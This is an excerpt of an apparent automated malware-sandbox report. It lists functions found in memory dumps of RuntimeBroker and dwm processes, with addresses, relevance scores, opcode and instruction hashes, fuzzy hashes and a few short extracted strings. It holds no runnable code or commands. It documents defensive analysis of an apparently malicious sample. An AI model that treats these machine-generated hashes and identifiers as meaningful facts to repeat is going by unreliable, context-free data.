                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8baf2a67b53561c333accbd73c42aa71e8535151dd88a858c8662aa5e78696f6
                                                                      • Instruction ID: 5177b5de11325785a182f14b6d3c787100ee9c4dfa0c75bf367e5d6daca9d0f1
                                                                      • Opcode Fuzzy Hash: 8baf2a67b53561c333accbd73c42aa71e8535151dd88a858c8662aa5e78696f6
                                                                      • Instruction Fuzzy Hash: BB31D466A0E649DFE715AB68D8451EC7FA0EF82351F1585B7D00CC62E3D9382589C7C1
                                                                      Function 00007FFAAB4A2601 Relevance: .1, Instructions: 88COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12d8a55218e22317042f2073ddb63b436d403c693663775453853a3c18edbe5d
                                                                      • Instruction ID: 0bdbe5ccc713a039df247792655be3cda88c2706a7f775fbe67400ddcf233353
                                                                      • Opcode Fuzzy Hash: 12d8a55218e22317042f2073ddb63b436d403c693663775453853a3c18edbe5d
                                                                      • Instruction Fuzzy Hash: 4C21DA51B1FB868FE684E36C88697B56AE1EF9A744F4441BED40CC31E3CC5928C94382
                                                                      Function 00007FFAAB4769E3 Relevance: .1, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cd4f23702225a6343ff54d1646f675867204086cc55967b60773324dc5b95489
                                                                      • Instruction ID: a701b335c9633e8fffa8be93ef07750a06e8b1cd1f156e5cd8aa7b2f1fe803cf
                                                                      • Opcode Fuzzy Hash: cd4f23702225a6343ff54d1646f675867204086cc55967b60773324dc5b95489
                                                                      • Instruction Fuzzy Hash: 3C21EB30D18569CFEB65DB08C454BA9B3E1FB59314F1085EAC40EE3291CA79AEC4CB80
                                                                      Function 00007FFAAB470C38 Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction ID: c306b72b7be54ba8e2b197199eed880950137f82dda53802c80e2249acc0d12c
                                                                      • Opcode Fuzzy Hash: 2ebf27d9b8c2bddb23783a1e6f405a056f4fa2622865dd980cdf28dcfa7ce27f
                                                                      • Instruction Fuzzy Hash: DF11A036A0E789DFE706DB68C8551AC7FB0EF43251F1584B7D048DB2A2D538568AC7C1
                                                                      Function 00007FFAAB476F3D Relevance: .1, Instructions: 57COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ae8878554dd1cd8181be162eb52a013301c54fc3bf6f5c049a0e052ed85ba1c
                                                                      • Instruction ID: 3089173145992eee1a7af038aa0226d79ca1da674978f822f29189d4fe11b4d2
                                                                      • Opcode Fuzzy Hash: 6ae8878554dd1cd8181be162eb52a013301c54fc3bf6f5c049a0e052ed85ba1c
                                                                      • Instruction Fuzzy Hash: 25118230D1E5098BEB54E718D8466B976D1FF56340F5041B9D84DD32E2ED286CC8C7C2
                                                                      Function 00007FFAAB470C40 Relevance: .1, Instructions: 51COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction ID: 11a590a174681ac3eea44667523e8970f4d37835ed70dcc31b1341a65cced8f7
                                                                      • Opcode Fuzzy Hash: 8f6b424134137d6587840da6032d2c86eb255bdee191464d7a689d668315282a
                                                                      • Instruction Fuzzy Hash: 4101CB32A0E788DFE70ADB68C8540A87FB0EF42250F0480B7D048DB2A2D5385A89C781
                                                                      Function 00007FFAAB470C48 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction ID: 5ac0458d7093ce37c656ae7377ba6151b46a1aabc89cd76a794a13be113f5d20
                                                                      • Opcode Fuzzy Hash: 9e7169293f19e7df325f4af45e249c862f5fa8bccd7cca672ef8b31adc6b1100
                                                                      • Instruction Fuzzy Hash: 45018C7590E389DFE70ADB68C8541A9BFB0EF42350F1981E7D048DB2A2D5385A89C781
                                                                      Function 00007FFAAB484D25 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab480000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction ID: ee650fc49c6a003e7efacc327835dd1d13448634b7f5a63c33c7bb8dba674e30
                                                                      • Opcode Fuzzy Hash: 5fb04a8ecc67890db30c3a10eeb76e0e86e6b84df3085faa2cf8fe9194738d51
                                                                      • Instruction Fuzzy Hash: BBF0B420E0D90BCFF755EB68E8606B93294FF56380F018175D42DC31F6EE28E80982C4
                                                                      Function 00007FFAAB4A8119 Relevance: .0, Instructions: 25COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction ID: eeafc1e56f36de83a091281aa2e99c09b7bfa6463249f1dfd222b7f83ceb12a6
                                                                      • Opcode Fuzzy Hash: 265d6d975da1c370076de69c664e47577e1242a7cd9164a8edcc6ee0b99e1ca6
                                                                      • Instruction Fuzzy Hash: C3E04F7194F7C08FC74B973888A88A07F60DF6721174A41EEC045CF6B3EA198C4AC752
                                                                      Function 00007FFAAB4AAC70 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB4AAD40 Relevance: .0, Instructions: 22COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                      • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                      • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                      Function 00007FFAAB489FB0 Relevance: .0, Instructions: 21COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab480000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction ID: 7bb4980382e7dcb1db52148dd5b2121b06889bc43a01599c3da9f6c54297e8d2
                                                                      • Opcode Fuzzy Hash: abcbcaeb8d0c721ad865de90b881b92e51d0d8aa06d5b75fc438a606a999e681
                                                                      • Instruction Fuzzy Hash: D5E0DF31E495078BF310A74498542F87201AB223A0F04C3B4C45CD72F6EE2CA90886C1
                                                                      Function 00007FFAAB484597 Relevance: .0, Instructions: 19COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB480000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB480000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab480000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: faba3c363463bb39deedfccfc82181fc6cc0ce839dbd3038d29411b7409303b5
                                                                      • Instruction ID: 889ca8688686d3a07529cf4814d766254b8f2473825bee1877aa90efac7c21aa
                                                                      • Opcode Fuzzy Hash: faba3c363463bb39deedfccfc82181fc6cc0ce839dbd3038d29411b7409303b5
                                                                      • Instruction Fuzzy Hash: 9CE08C71E2992ACFF764DBA8E8056BD67F2FB84340F900136D019C7395CE242C064790
                                                                      Function 00007FFAAB4706E8 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8b15855793bfca8ac6cc48260a94a17fb8f6799355fb84b68b3618869aa3aa6e
                                                                      • Instruction ID: 7ebd212c9277707bf235bc0ed2c1817190614cccdcfc744b3e57a909e8f661e2
                                                                      • Opcode Fuzzy Hash: 8b15855793bfca8ac6cc48260a94a17fb8f6799355fb84b68b3618869aa3aa6e
                                                                      • Instruction Fuzzy Hash: E3D05E2A54A55AABCA01B73CD485ED43BE0BF8A215B8900F0E40DCB1A3D94A98C8C384
                                                                      Function 00007FFAAB4A25E0 Relevance: .0, Instructions: 18COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                      • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                      • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                      Function 00007FFAAB4A7700 Relevance: .0, Instructions: 17COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB4A1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB4A1000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab4a1000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction ID: 0b4c1ba5f4c3e8568460a917849240ee7d11210dce756e12cf07391d85ff6013
                                                                      • Opcode Fuzzy Hash: a7ccd9d2cca88e0acce79a096b5c88f796d61db368ddf3302dbc1b77a8c09c83
                                                                      • Instruction Fuzzy Hash: 02D01234B619044F870CA738885987477D1EB6A216B9540ADD00AC72B1D96ADC99C781
                                                                      Function 00007FFAAB470B9A Relevance: .0, Instructions: 15COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction ID: 5d6e81b34bc9f67479e3927315d3e938a9b7610a88fad50f39688fefc833bcb4
                                                                      • Opcode Fuzzy Hash: ea49223fd1a816fd1b362e084a2150523c639c30c7cf8a22846f769d5ebcd9de
                                                                      • Instruction Fuzzy Hash: D3D012345768498FC650E728D9954A4BB90FB0A214F8901D0D40CC7161D3569894C741
                                                                      Function 00007FFAAB4706A5 Relevance: .0, Instructions: 13COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction ID: 9182ade74973473efd9a91cb18fcff3fe863572f8a8b4ccf94988b8c2aa409b5
                                                                      • Opcode Fuzzy Hash: 492715d0345259cd22954f87a1d169ce04240646543a6308cca8d53054399d7f
                                                                      • Instruction Fuzzy Hash: DEC08C00E0B40B83B810B33E14120ACA9006BC7290FD08032C10C802E19C4E20DD81C6
                                                                      Function 00007FFAAB4712B8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction ID: 43e346325f29e7365e5b0cbc07af6b3bfadc9982b9ec397910975f9166f44ce6
                                                                      • Opcode Fuzzy Hash: d4ba06150ed00881c4cf65a6fed42ef92c57d35f82581e5d446d3181800b7739
                                                                      • Instruction Fuzzy Hash: A0C04C345519498FC948EB29C88591477A0FB1A215BD600D0E40DC7171D659DCD5C781
                                                                      Function 00007FFAAB4706F8 Relevance: .0, Instructions: 12COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 88160018213296c98ff7730082f783a1c6affe83cee1852b15dc38e6e2ce1f28
                                                                      • Instruction ID: fabdf414e9f9c96cf86900beb8281f0c6db7f4ffe3e7fd0b26d9d9ee371761ca
                                                                      • Opcode Fuzzy Hash: 88160018213296c98ff7730082f783a1c6affe83cee1852b15dc38e6e2ce1f28
                                                                      • Instruction Fuzzy Hash: A4C04C345518098FC944EB2DC895D5476A0FB1A315BD50090E40DC7171E65ADCD5D785
                                                                      Function 00007FFAAB473416 Relevance: .0, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: dfe7491dd36b927bca7373b9880959b9fba4eb5d170968aae97e5bfbe1507714
                                                                      • Instruction ID: fb99943bcbb2b7cb5539a8fa312b95f4e269e03873f7b9fb093da717dfced196
                                                                      • Opcode Fuzzy Hash: dfe7491dd36b927bca7373b9880959b9fba4eb5d170968aae97e5bfbe1507714
                                                                      • Instruction Fuzzy Hash: ACC08C02F08CAA97F214A228C02163F00829F80A48F8004B0E00DC63C6CC0C6B0102C2
                                                                      Function 00007FFAAB473A81 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction ID: 6db26826a2423f8c86332fdba027ea285eabc923419afa289c2718a17ee9d05b
                                                                      • Opcode Fuzzy Hash: 073d9c353f8b61f72971ab2a2759b3774695763181e287a262662aa7889bbd8c
                                                                      • Instruction Fuzzy Hash: 83C02B10C0E004C3E329873044051FD31401F5A300F05C172C00E52091DE28244C91C0
                                                                      Function 00007FFAAB4706C8 Relevance: .0, Instructions: 8COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction ID: a5735ffe0b8818d5644c87d865a7e8281c1521c7f2e206bd483853161b9d9d55
                                                                      • Opcode Fuzzy Hash: 14727f7c39f492ae433c84a642adf36ffcae6a728a13de46db1a285b7774d304
                                                                      • Instruction Fuzzy Hash: 72B01200C5740F42A814337E0842064B8505B46140FC04070D40C501D5984E10EC42C3

                                                                      Non-executed Functions

                                                                      Function 00007FFAAB4709B0 Relevance: 5.2, Strings: 4, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000020.00000002.1890389175.00007FFAAB470000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB470000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_32_2_7ffaab470000_RuntimeBroker.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: c9$!k9$"s9$#{9
                                                                      • API String ID: 0-1692736845
                                                                      • Opcode ID: 91ea4ea9e33552e139f53edaf68bc956bfd96a0aac990771789deb1b14fafc5c
                                                                      • Instruction ID: 40cae4d5181ea78131fe2c0bbc18da0b7c6517f1a69a3b279efe9b1d56bf911b
                                                                      • Opcode Fuzzy Hash: 91ea4ea9e33552e139f53edaf68bc956bfd96a0aac990771789deb1b14fafc5c
                                                                      • Instruction Fuzzy Hash: 1351D34BB4942376E11237FCF40A8FC6BA8EFD1376B494AB7D04DC91934D0968C582E5

                                                                      Executed Functions

                                                                      Function 00007FFAAB440D4C Relevance: 6.5, Strings: 5, Instructions: 267COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB440000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB440000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab440000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "93$5[_H$b43$r63$r63
                                                                      • API String ID: 0-3569791616
                                                                      • Opcode ID: 65200583daf4d5951118ca1de82034f949727ff097983eb25575558ad9392b0b
                                                                      • Instruction ID: caa96bfeba33bcea8aeda9fa647c0aad0680066046df5e28e7e2126b8b9822b4
                                                                      • Opcode Fuzzy Hash: 65200583daf4d5951118ca1de82034f949727ff097983eb25575558ad9392b0b
                                                                      • Instruction Fuzzy Hash: EA9128B6A19A998FE749DF68C8697E97FE1FB96304F4000BAC04ED73D6CA781424C740
                                                                      Function 00007FFAAB471945 Relevance: 1.7, Strings: 1, Instructions: 460COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: 4d7832784680cffe7e5b511b6ba4817a0cefda48d24218896f4ed09a6276e16e
                                                                      • Instruction ID: 78dd8a6a07ac66b1ae8c69686c0fcaf78605ea00bca12b7fe6e89214c10a8552
                                                                      • Opcode Fuzzy Hash: 4d7832784680cffe7e5b511b6ba4817a0cefda48d24218896f4ed09a6276e16e
                                                                      • Instruction Fuzzy Hash: D5C1CD62A2D6964BE31D4B284C860B577D6EBD3241B18C67DD8DFC7097F928E84BC2C1
                                                                      Function 00007FFAAB472CB6 Relevance: 1.4, Strings: 1, Instructions: 120COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: r63
                                                                      • API String ID: 0-1294201789
                                                                      • Opcode ID: a53622955c37f24306319416a5407aafb78d768e3053bc416b99836719399cff
                                                                      • Instruction ID: 39c43df69a3e9a5ecd22ac9873b11968a1a9015c7a785f9d4c360aab59ce8c62
                                                                      • Opcode Fuzzy Hash: a53622955c37f24306319416a5407aafb78d768e3053bc416b99836719399cff
                                                                      • Instruction Fuzzy Hash: 1141C531A0995ACFDB58EB58C494BB877A2FB9B350F0442B9D40DC72D6CE286C89C7C1
                                                                      Function 00007FFAAB475494 Relevance: 1.3, Strings: 1, Instructions: 70COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 63
                                                                      • API String ID: 0-3819469774
                                                                      • Opcode ID: b3fe653f2ceb0dc974246faed457364f193544b2c9650de719aa758844f4f60d
                                                                      • Instruction ID: 7fdff469e58951da33bf2e2234c997fa6964a61fcea2f85cbc3b0f92dff63ce4
                                                                      • Opcode Fuzzy Hash: b3fe653f2ceb0dc974246faed457364f193544b2c9650de719aa758844f4f60d
                                                                      • Instruction Fuzzy Hash: BD214F71A199598FE798EB28C8566F8B3A1FFA9340F5085F5D04DC3196CD246DC58B80
                                                                      Function 00007FFAAB47DF06 Relevance: 1.3, Strings: 1, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 8e=
                                                                      • API String ID: 0-1240725123
                                                                      • Opcode ID: 47199bd036be48ff08a08e84b6b085e6433b9a9cb25dea910354e41a714f675a
                                                                      • Instruction ID: f8fe6a222f3be97631b1b3666d7d69d4705916f1088196e6c8335bf21e007184
                                                                      • Opcode Fuzzy Hash: 47199bd036be48ff08a08e84b6b085e6433b9a9cb25dea910354e41a714f675a
                                                                      • Instruction Fuzzy Hash: B301BC72F1891A8BEB94EA28C4497BD73E1EF95351F048576D00DD7190DE28A8D8CBC0
                                                                      Function 00007FFAAB4737C9 Relevance: 1.3, Strings: 1, Instructions: 30COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000021.00000002.1970888549.00007FFAAB471000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB471000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_33_2_7ffaab471000_dwm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: M
                                                                      • API String ID: 0-3664761504
                                                                      • Opcode ID: 2aea2419dd350be5aca04bd3521452519eaf3f094047496acd3fb0bad66fac91
                                                                      • Instruction ID: 0fb0b3267fff6d9b5198283deacce8a94e31259c5d1254573310772f3fed70aa
